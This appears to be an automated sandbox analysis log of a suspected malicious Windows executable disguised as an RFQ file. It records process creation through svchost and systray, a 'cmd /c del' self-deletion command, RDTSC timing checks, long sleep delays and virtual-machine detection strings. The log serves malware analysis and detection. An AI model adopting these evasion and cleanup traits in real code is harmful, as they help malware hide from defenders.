Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0015F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014C602 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_000E4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | File created: C:\Users\user\AppData\Local\Temp\aut82C5.tmp
Source: C:\Windows\SysWOW64\systray.exe | Command line argument: SystemTray_Main | 4_2_006713B0
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MKCC-MEC-RFQ-115-2024.exe | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
Source: C:\Windows\SysWOW64\systray.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: MKCC-MEC-RFQ-115-2024.exe | Static file information: File size 1081856 > 1048576
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: systray.pdb source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0015C304 LoadLibraryA,GetProcAddress, 1_2_0015C304
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00108B85 push ecx; ret 1_2_00108B98
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041793E push eax; ret 2_2_00417942
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A99E pushfd ; ret 2_2_0040A99F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E343 push eax; retf 2_2_0040E344
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041DB1D push edx; ret 2_2_0041DC78
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416CD6 push eax; ret 2_2_00416CD9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D4F2 push eax; ret 2_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D4FB push eax; ret 2_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D4A5 push eax; ret 2_2_0041D4F8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E552 push dword ptr [B4E3C852h]; ret 2_2_0041E577
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D55C push eax; ret 2_2_0041D562
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416627 push 00000000h; retf 2_2_00416629
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041B714 push ecx; ret 2_2_0041B715
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300225F pushad ; ret 2_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030027FA pushad ; ret 2_2_030027F9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300283D push eax; iretd 2_2_03002858
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300135E push eax; iretd 2_2_03001369
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F1EB1E push esp; retn 0000h 2_2_02F1EB1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F1EB02 push esp; retn 0000h 2_2_02F1EB03
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F1E9B5 push esp; retn 0000h 2_2_02F1EAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_0B1FEB1E push esp; retn 0000h 3_2_0B1FEB1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_0B1FEB02 push esp; retn 0000h 3_2_0B1FEB03
          Source: C:\Windows\explorer.exe | Code function: 3_2_0B1FE9B5 push esp; retn 0000h 3_2_0B1FEAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10D1F9B5 push esp; retn 0000h 3_2_10D1FAE7
          Source: C:\Windows\explorer.exe | Code function: 3_2_10D1FB1E push esp; retn 0000h 3_2_10D1FB1F
          Source: C:\Windows\explorer.exe | Code function: 3_2_10D1FB02 push esp; retn 0000h 3_2_10D1FB03
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00671B3D push ecx; ret 4_2_00671B50
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D127FA pushad ; ret 4_2_04D127F9
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D1225F pushad ; ret 4_2_04D127F9
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D1283D push eax; iretd 4_2_04D12858
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_000E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_000E4A35
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_001655FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_001655FD
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_001033C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_001033C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | API/Special instruction interceptor: Address: EF3254
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818DA44
          Source: C:\Windows\SysWOW64\svchost.exe | API/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF90818D324
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF908190774
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF90818D944
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF90818D504
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF90818D544
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF90818D1E4
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF908190154
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF90818D8A4
          Source: C:\Windows\SysWOW64\systray.exe | API/Special instruction interceptor: Address: 7FF90818DA44
          Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe | RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 2E59904 second address: 2E5990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 2E59B6E second address: 2E59B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 1350
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 8589
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 870
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 880
          Source: C:\Windows\SysWOW64\systray.exe | Window / User API: threadDelayed 2643
          Source: C:\Windows\SysWOW64\systray.exe | Window / User API: threadDelayed 7328
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_1-99452
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | API coverage: 5.0 %
          Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 2.1 %
          Source: C:\Windows\SysWOW64\systray.exe | API coverage: 2.2 %
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep count: 1350 > 30
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep time: -2700000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep count: 8589 > 30
          Source: C:\Windows\explorer.exe TID: 8132 | Thread sleep time: -17178000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940 | Thread sleep count: 2643 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940 | Thread sleep time: -5286000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940 | Thread sleep count: 7328 > 30
          Source: C:\Windows\SysWOW64\systray.exe TID: 7940 | Thread sleep time: -14656000s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00144696 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00144696
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014C93C FindFirstFileW,FindClose, 1_2_0014C93C
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_0014C9C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0014F200
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_0014F35D
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0014F65E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00143A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00143A2B
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00143D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00143D4E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_0014BF27
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_000E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_000E4AFE
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.3881532572.000000000888E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
          Source: explorer.exe, 00000003.00000002.3882013964.0000000008979000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00`
          Source: explorer.exe, 00000003.00000003.3086041137.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
          Source: explorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWe
          Source: explorer.exe, 00000003.00000002.3881532572.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3086041137.0000000008685000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
          Source: explorer.exe, 00000003.00000003.3086041137.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
          Source: explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.1438602211.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
